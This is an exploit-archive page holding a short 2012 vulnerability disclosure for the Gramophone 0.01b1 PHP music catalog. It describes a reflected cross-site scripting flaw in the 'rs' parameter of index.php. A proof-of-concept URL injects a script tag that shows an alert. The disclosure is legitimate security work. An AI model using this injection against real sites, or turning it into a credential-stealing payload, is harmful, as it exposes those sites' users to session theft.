Gramophone 0.01b1 Cross Site Scripting

Gramophone 0.01b1 Cross Site Scripting: Posted Oct 26, 2012; Authored by G13; Gramophone version 0.01b1 suffers from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 9a5b7f1d75d39c8243db9196336bba6a28809e6f294600da4c464d019c5081b3; Download | Favorite | View

Gramophone 0.01b1 Cross Site Scripting

# Exploit Title: Gramophone v0.01b1 'rs' XSS
# Date: 10/25/12
# Author: G13
# Twitter: @g13net
# Software Site: https://github.com/benbruscella/Gramophone
# Version: 0.01b1
# Category: webapp (php)
#

##### ToC #####

0x01 Description
0x02 XSS
0x03 Vendor Notification

##### 0x01 Description #####

Gramophone is a music system used to catalog your music collection

##### 0x02 XSS #####

-----Vulnerability-----

The 'rs' parameter on index.php is vulnerable to reflective cross site scripting

-----PoC-----

http://localhost/gramophone/index.php?rs=%3Cscript%3Ealert%281%29%3C/script%3E

##### 0x03 Vendor Notification #####

As per my policy, vulnerability has been released.

http://www.g13net.com/vuln-disc.txt

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Gramophone 0.01b1 Cross Site Scripting

Gramophone 0.01b1 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Gramophone 0.01b1 Cross Site Scripting

Share This

Gramophone 0.01b1 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems